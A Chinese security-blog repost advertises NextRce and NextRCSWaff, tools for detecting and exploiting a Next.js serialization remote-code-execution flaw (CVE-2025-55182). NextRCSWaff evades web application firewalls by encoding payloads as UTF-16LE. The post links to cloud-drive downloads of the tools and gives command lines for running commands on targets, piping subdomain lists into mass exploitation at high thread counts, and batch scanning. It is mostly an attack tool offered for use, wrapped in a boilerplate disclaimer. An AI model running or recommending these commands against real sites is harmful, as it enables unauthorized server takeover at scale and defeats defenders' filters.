文章总结： 本文介绍了针对Next.jsCVE-2025-55182漏洞的检测与利用工具NextRce及WAF绕过工具NextRCSWaff。NextRce支持多线程扫描以识别存在序列化漏洞的目标；NextRCSWaff利用UTF-16LE编码绕过特征匹配防火墙，成功执行命令。文章提供了详细的安装、单目标测试、批量扫描及管道模式使用方法，适用于红队测试与漏洞挖掘。 综合评分： 85 文章分类： 漏洞POC,WEB安全,渗透测试,安全工具

React Shell与Next.js漏洞利用和WAF绕过工具 — NextRce&NextRCSWaff

原创

Wolfse

风铃Sec

2025年12月26日 18:18 福建

声明：仅用于授权测试，用户滥用造成的一切后果和作者无关 请遵守法律法规！【无需回复关键字，文中第二部分0x02获取工具】

0x01 工具简介

NextRce是一款高性能、多线程的安全工具，旨在检测并利用CVE – 2025 – 55182漏洞。通过操纵服务器操作中的序列化过程，NextRce注入精心设计的有效负载，以在易受攻击的实例上实现远程代码执行（RCE）。它配备了智能检测引擎，可自动区分易受攻击的应用路由架构和安全的旧版页面路由，确保在大规模扫描时的效率。

WAF绕过

包含像 child_process 或 execSync 这样关键字的标准有效负载通常会被 Web 应用防火墙（WAF）阻止。

NextRCSWaff使用了一种专门的 UTF – 16LE（小端序）编码引擎。通过以这种特定格式对恶意有效负载进行编码，字节序列会完全改变，从而使大多数基于签名的 WAF 无法识别。然而，Next.js（Node.js）服务器能够正确解码并执行该命令。

0x02 工具获取

夸克网盘「NextRce.zip」

链接：https://pan.quark.cn/s/128d06a657b4

0x03 工具使用

安装

cd NextRce && pip install requests

使用示例

1.WAF 绕过模式（使用 NextRCSWaff.py）

当目标看起来存在漏洞，但标准漏洞利用方法被阻止时，请使用此脚本。

python3 NextRCSWaff.py -u https://target.com) -c "whoami" --bypass

2.管道 / 漏洞赏金模式

专为 Linux 管道设计。可将子域名列表直接通过管道输入到该工具中。

subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 nextrce.py -c "id" -t 50

subfinder -d target.com -silent | httpx -sc -td -title -server -silent | python3 NextRCSWaff.py -c "id" -B

3.从文件进行批量扫描

以高并发方式从文件中扫描一系列 URL。

python3 nextrce.py -l targets.txt -c "whoami" -t 100

4.代理模式（调试）

通过Burp Suite或其他代理路由流量以进行分析。

python3 nextrce.py -u https://target.com -p http://127.0.0.1:8080

0x04 每日资源分享【综合漏洞自检工具-持续更新】

夸克网盘「综合漏洞自检测工具」

链接：https://pan.quark.cn/s/302256a9ecf6

新增：next.js CVE-2025-55182 浏览器扩展 + 漏洞利用脚本

新增：NextRce&NextRCSWaff（WAF绕过工具）

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：风铃Sec Wolfse《React Shell与Next.js漏洞利用和WAF绕过工具 — NextRce&NextRCSWaff》